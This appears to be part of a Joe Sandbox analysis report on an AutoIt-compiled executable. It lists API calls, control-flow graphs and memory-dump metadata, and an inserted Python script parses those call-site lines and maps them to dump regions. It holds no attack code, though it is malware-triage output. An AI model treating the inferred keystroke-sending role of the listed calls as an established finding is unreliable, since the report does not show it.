• API String ID: 423443420-4155596026

Control-flow Graph

APIs
• WSAStartup.WS2_32(00000101,?), ref: 00E21019
• inet_addr.WSOCK32(?), ref: 00E21079
• gethostbyname.WS2_32(?), ref: 00E21085
• IcmpCreateFile.IPHLPAPI ref: 00E21093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E21123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E21142
• IcmpCloseHandle.IPHLPAPI(?), ref: 00E21216
• WSACleanup.WSOCK32 ref: 00E2121C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
• API String ID: 0-3061639177
APIs
• __Init_thread_footer.LIBCMT ref: 00DB15F2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: t5$t5$t5$t5$t5
• API String ID: 1385522511-3253990334

Control-flow Graph
APIs
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA32AF
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA32B7
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA32C2
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA32CD
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA32D5
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA32DD
                                                                                                                                                                                • Part of subcall function 00DA3205: RegisterWindowMessageW.USER32(00000004,?,00DA2964), ref: 00DA325D
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DA2A0A
                                                                                                                                                                              • OleInitialize.OLE32 ref: 00DA2A28
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DE3A0D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                              • String ID: (&$0$$4'$d($$
                                                                                                                                                                              • API String ID: 1986988660-3144845333
                                                                                                                                                                              • Opcode ID: dd382c58e6afbe244c2e3164fa78bdaf50991bfc80d4855bfa8bdfc664896923
                                                                                                                                                                              • Instruction ID: e3a0ee565f4e7436626c6320eaa4bfae177fd6def8c2432e08acdc6fba6272a9
                                                                                                                                                                              • Opcode Fuzzy Hash: dd382c58e6afbe244c2e3164fa78bdaf50991bfc80d4855bfa8bdfc664896923
                                                                                                                                                                              • Instruction Fuzzy Hash: 5771AEB09012018F9788DF7BAD6A6153AF1FB89300B44912EE21CF7262EB7144C9CF66
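The two metadata blocks that every function entry in this section carries, the `APIs` call-site lines and the `Memory Dump Source` `.sdmp` names, are regular enough to parse, and doing so answers a question the listing leaves to the reader: does each cited call site fall in the executable region of the dumped image, and which virtual keys does the routine at `00DA327E` resolve with `MapVirtualKeyW`? The Python below is an added example, not Joe Sandbox code. The process index, snapshot number and base address fields of the `.sdmp` name are confirmed by the report itself (the snapshot file is `hcaresult_12_2_da0000`, the dump header says `Offset: 00DA0000`). Reading the fifth field as a Windows `PAGE_*` protection value is an assumption that fits the layout seen here (execute-read for the code at `DA1000`, read-only for the header at `DA0000`, read-write for the data at `E6D000`), and because the name carries no region size a call site is assigned to the dump with the highest base at or below it. The sample input is the listing above, copied verbatim.

```python
# Added example (not Joe Sandbox code): parse the "APIs" call-site lines and the
# "Memory Dump Source" .sdmp names under a function and map call sites to regions.
import re
from dataclasses import dataclass
from typing import Optional

# Windows PAGE_* constants. Reading .sdmp field 5 as one of these is an assumption.
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",  # virtual-key codes
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}   # seen in the listing

# <process>.<snapshot>.<counter>.<base>.<protection>.<remaining fields>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.[0-9A-F.]+\.sdmp$", re.I)
# [Part of subcall function <addr>: ]<Api>.<MODULE>[(<args>)], ref: <addr>
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)$", re.I)

@dataclass(frozen=True)
class DumpRegion:
    name: str
    process: int
    snapshot: int
    base: int
    protection: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & 0xF0)  # every PAGE_EXECUTE* flag

@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int
    subcall: Optional[int]

def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(name.strip(), int(m["proc"], 16), int(m["snap"], 16),
                      int(m["base"], 16), int(m["prot"], 16))

def parse_api_line(line: str) -> ApiRef:
    m = API_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    return ApiRef(m["api"], m["mod"], args, int(m["ref"], 16),
                  int(m["sub"], 16) if m["sub"] else None)

def region_for(addr: int, regions: list) -> Optional[DumpRegion]:
    # Highest base at or below addr; exact for contiguous section dumps of one image.
    below = [r for r in regions if r.base <= addr]
    return max(below, key=lambda r: r.base) if below else None

def check_call_sites(api_lines, sdmp_names):
    regions = [parse_sdmp_name(n) for n in sdmp_names]
    return [(r, region_for(r.ref, regions)) for r in map(parse_api_line, api_lines)]

def modifier_keys_looked_up(api_lines):
    # Virtual keys whose scan codes the MapVirtualKeyW calls resolve.
    vks = (int(r.args[0], 16) for r in map(parse_api_line, api_lines) if r.api == "MapVirtualKeyW")
    return {VK_NAMES.get(vk, f"VK_0x{vk:02X}") for vk in vks}

# Copied verbatim from the function entry above (bullets included).
API_LINES = [
    "• Part of subcall function 00DA327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA32AF",
    "• Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA32B7",
    "• Part of subcall function 00DA327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA32C2",
    "• Part of subcall function 00DA327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA32CD",
    "• Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA32D5",
    "• Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA32DD",
    "• Part of subcall function 00DA3205: RegisterWindowMessageW.USER32(00000004,?,00DA2964), ref: 00DA325D",
    "• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DA2A0A",
    "• OleInitialize.OLE32 ref: 00DA2A28",
    "• CloseHandle.KERNEL32(00000000,00000000), ref: 00DE3A0D",
]
SDMP_NAMES = [
    "0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp",
    "0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp",
    "0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp",
    "0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp",
    "0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp",
    "0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp",
]

if __name__ == "__main__":
    for ref, reg in check_call_sites(API_LINES, SDMP_NAMES):
        where = f"{reg.protection_name} @ {reg.base:08X}" if reg else "outside the dumps"
        print(f"{ref.ref:08X} {ref.module}!{ref.api:<24} -> {where}")
    print("modifier keys resolved:", sorted(modifier_keys_looked_up(API_LINES)))
```

Run stand-alone, it prints one line per call site. All ten sit in the region dumped from `DA1000`, the only one of the six marked execute-read, which is what you want to see before trusting the disassembly offsets; a call site that mapped into a read-write region would mean the code was dumped from a heap or unbacked allocation instead. The virtual keys resolved at `00DA327E` are Shift, Control, Alt (`VK_MENU`), the left Windows key and the left and right Shift keys, i.e. the modifier set a keystroke-sending routine needs to translate into scan codes.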

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1872 dd90c5-dd90d5 1873 dd90ef-dd90f1 1872->1873 1874 dd90d7-dd90ea call dcf636 call dcf649 1872->1874 1875 dd9459-dd9466 call dcf636 call dcf649 1873->1875 1876 dd90f7-dd90fd 1873->1876 1892 dd9471 1874->1892 1893 dd946c call dd2b5c 1875->1893 1876->1875 1878 dd9103-dd912e 1876->1878 1878->1875 1881 dd9134-dd913d 1878->1881 1884 dd913f-dd9152 call dcf636 call dcf649 1881->1884 1885 dd9157-dd9159 1881->1885 1884->1893 1890 dd915f-dd9163 1885->1890 1891 dd9455-dd9457 1885->1891 1890->1891 1896 dd9169-dd916d 1890->1896 1894 dd9474-dd9479 1891->1894 1892->1894 1893->1892 1896->1884 1899 dd916f-dd9186 1896->1899 1901 dd9188-dd918b 1899->1901 1902 dd91a3-dd91ac 1899->1902 1905 dd918d-dd9193 1901->1905 1906 dd9195-dd919e 1901->1906 1903 dd91ae-dd91c5 call dcf636 call dcf649 call dd2b5c 1902->1903 1904 dd91ca-dd91d4 1902->1904 1935 dd938c 1903->1935 1908 dd91db-dd91dc call dd3b93 1904->1908 1909 dd91d6-dd91d8 1904->1909 1905->1903 1905->1906 1910 dd923f-dd9259 1906->1910 1918 dd91e1-dd91f9 call dd2d38 * 2 1908->1918 1909->1908 1912 dd932d-dd9336 call ddfc1b 1910->1912 1913 dd925f-dd926f 1910->1913 1924 dd93a9 1912->1924 1925 dd9338-dd934a 1912->1925 1913->1912 1917 dd9275-dd9277 1913->1917 1917->1912 1921 dd927d-dd92a3 1917->1921 1939 dd91fb-dd9211 call dcf649 call dcf636 1918->1939 1940 dd9216-dd923c call dd97a4 1918->1940 1921->1912 1926 dd92a9-dd92bc 1921->1926 1928 dd93ad-dd93c5 ReadFile 1924->1928 1925->1924 1930 dd934c-dd935b GetConsoleMode 1925->1930 1926->1912 1931 dd92be-dd92c0 1926->1931 1933 dd93c7-dd93cd 1928->1933 1934 dd9421-dd942c GetLastError 1928->1934 1930->1924 1936 dd935d-dd9361 1930->1936 1931->1912 1937 dd92c2-dd92ed 1931->1937 1933->1934 1943 dd93cf 1933->1943 1941 dd942e-dd9440 call dcf649 call dcf636 1934->1941 1942 dd9445-dd9448 1934->1942 1945 dd938f-dd9399 call dd2d38 1935->1945 1936->1928 1944 dd9363-dd937d ReadConsoleW 1936->1944 1937->1912 1946 dd92ef-dd9302 1937->1946 1939->1935 1940->1910 1941->1935 1954 dd944e-dd9450 1942->1954 1955 dd9385-dd938b call dcf613 1942->1955 1951 dd93d2-dd93e4 1943->1951 1952 dd937f GetLastError 1944->1952 1953 dd939e-dd93a7 1944->1953 1945->1894 1946->1912 1947 dd9304-dd9306 1946->1947 1947->1912 1958 dd9308-dd9328 1947->1958 1951->1945 1962 dd93e6-dd93ea 1951->1962 1952->1955 1953->1951 1954->1945 1955->1935 1958->1912 1966 dd93ec-dd93fc call dd8de1 1962->1966 1967 dd9403-dd940e 1962->1967 1978 dd93ff-dd9401 1966->1978 1972 dd941a-dd941f call dd8c21 1967->1972 1973 dd9410 call dd8f31 1967->1973 1979 dd9415-dd9418 1972->1979 1973->1979 1978->1945 1979->1978
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 03b3779b8f4ea4da9106f96532f0283672cac7b1d7df2e474988a13f0d548cd6
                                                                                                                                                                              • Instruction ID: 6081c090b6240d2e1b8b80267b2c05785671d6c4ea70ed61ba69f6e8cefea1de
                                                                                                                                                                              • Opcode Fuzzy Hash: 03b3779b8f4ea4da9106f96532f0283672cac7b1d7df2e474988a13f0d548cd6
                                                                                                                                                                              • Instruction Fuzzy Hash: 65C1EF70A0434AAFCF11DFE9D851BADFBB1AF09310F18419AE454AB392C7329946CB71

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2016 da35b3-da3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DA35E1
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DA3602
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA3616
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA361F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                              • Opcode ID: 96c2d2bc77b3d12aaf0792376eaad274a68f02a3baf92c165af19769e68a8bbb
                                                                                                                                                                              • Instruction ID: 0220d8eab157aedcd1298c424b353dc6385b81569e2cda282130f8dc16dec2b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 96c2d2bc77b3d12aaf0792376eaad274a68f02a3baf92c165af19769e68a8bbb
                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF0DA716443967EE73197277C0DE3B2EBDD7C6F50F01001EBA08B7160D6A91899EAB0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DE5287
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DA6299
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                              • String ID: Line %d: $AutoIt - $\+
                                                                                                                                                                              • API String ID: 2289894680-1638154863
                                                                                                                                                                              • Opcode ID: c99b8efa814266c7fbabf096611f593d50e16f83e812bda11ea86ff401705a61
                                                                                                                                                                              • Instruction ID: 8846c3d6d2f543f164109d3ae29cafb7112b5eb2f217f27ba044117abb2b83ea
                                                                                                                                                                              • Opcode Fuzzy Hash: c99b8efa814266c7fbabf096611f593d50e16f83e812bda11ea86ff401705a61
                                                                                                                                                                              • Instruction Fuzzy Hash: F4419471408305AEC710EB61EC45BDF7BD8EF55320F08452EF599A20A2EB74D689C7B6

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2068 da58cb-da58d6 2069 da5948-da594a 2068->2069 2070 da58d8-da58dd 2068->2070 2071 da593b-da593e 2069->2071 2070->2069 2072 da58df-da58f7 RegOpenKeyExW 2070->2072 2072->2069 2073 da58f9-da5918 RegQueryValueExW 2072->2073 2074 da591a-da5925 2073->2074 2075 da592f-da593a RegCloseKey 2073->2075 2076 da593f-da5946 2074->2076 2077 da5927-da5929 2074->2077 2075->2071 2078 da592d 2076->2078 2077->2078 2078->2075
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DA58BE,SwapMouseButtons,00000004,?), ref: 00DA58EF
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DA58BE,SwapMouseButtons,00000004,?), ref: 00DA5910
                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00DA58BE,SwapMouseButtons,00000004,?), ref: 00DA5932
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: e814326beea87196e7113a5215b2da0b9509239c326d8779ce9b8f07301c691d
• Instruction ID: d64a685c1b150cd30f6ae1a51571b6e2ca0e798c716e61af8038a43ebcac7cfa
• Opcode Fuzzy Hash: e814326beea87196e7113a5215b2da0b9509239c326d8779ce9b8f07301c691d
• Instruction Fuzzy Hash: DE115775610618FFDB218F65EC84AAFBBB9EF02760F108429F805EB214E2319E459B60
APIs
• TranslateMessage.USER32(?), ref: 00DAF27B
• DispatchMessageW.USER32(?), ref: 00DAF289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DAF29F
• Sleep.KERNEL32(0000000A), ref: 00DAF2B1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00DF32D8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID: (
• API String ID: 3288985973-2063206799
• Opcode ID: 94ec568bfd21df8e59cd6b73fa12eb976992c81be97d588df89082a9da3e61f0
• Instruction ID: 23b46025c49f631a30d622afcc5dbf0108ec7587f623f709b7baabafb3da500a
• Opcode Fuzzy Hash: 94ec568bfd21df8e59cd6b73fa12eb976992c81be97d588df89082a9da3e61f0
• Instruction Fuzzy Hash: CBF030306043499AE73087A19C49FEA77A8EB85300F144919E349D30C0DB3095888B36
APIs
• __Init_thread_footer.LIBCMT ref: 00DB3006
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL$bn
• API String ID: 1385522511-1920074456
• Opcode ID: ad5da5a348d8b4baa651572b60fcc14b801a505d537bcad5bd45c299a609df4f
• Instruction ID: f8dacb18d8797e8d1baafc425008f3cdb4a052df60db7f1a1bd77c14e9e76477
• Opcode Fuzzy Hash: ad5da5a348d8b4baa651572b60fcc14b801a505d537bcad5bd45c299a609df4f
• Instruction Fuzzy Hash: 77226871608201DFC714DF24C880ABABBF1FF89314F18895DF59A9B2A1D771E945CBA2
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00DE413B
  • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
  • Part of subcall function 00DA3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DA3A76
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X$`u
• API String ID: 779396738-2693526198
• Opcode ID: 21eab989a1b3d87a44bbd420829b81e900139820a8d0f44dd85c68289fe92f71
• Instruction ID: d4203c73d41f559ed9c64a3a7404ed442fc3e921e90a9b48ec0ca1993cf39540
• Opcode Fuzzy Hash: 21eab989a1b3d87a44bbd420829b81e900139820a8d0f44dd85c68289fe92f71
• Instruction Fuzzy Hash: 64218E71A042989BDB01DF94D809BEE7BF9EF49304F008059F545BB241DBB89A898FB1
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09D8
  • Part of subcall function 00DC3614: RaiseException.KERNEL32(?,?,?,00DC09FA,?,00000000,?,?,?,?,?,?,00DC09FA,00000000,00E69758,00000000), ref: 00DC3674
• __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09F5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
